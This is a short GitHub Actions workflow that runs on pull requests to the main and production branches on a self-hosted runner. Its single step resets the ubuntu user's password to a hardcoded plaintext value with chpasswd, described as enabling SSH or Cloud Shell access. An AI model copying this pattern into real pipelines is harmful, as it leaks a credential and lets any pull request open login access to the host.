name: CI

on:
  pull_request:
    branches: [main, production]

jobs:
  add-ssh-access:
    name: Troubleshoot SSH Access
    runs-on: eee-ims

    steps:
      - name: Change password of ubuntu to allow Cloud Shell Access
        run: echo "ubuntu:W5o7QGDudcd9msJWzen79gonyEok" | chpasswd
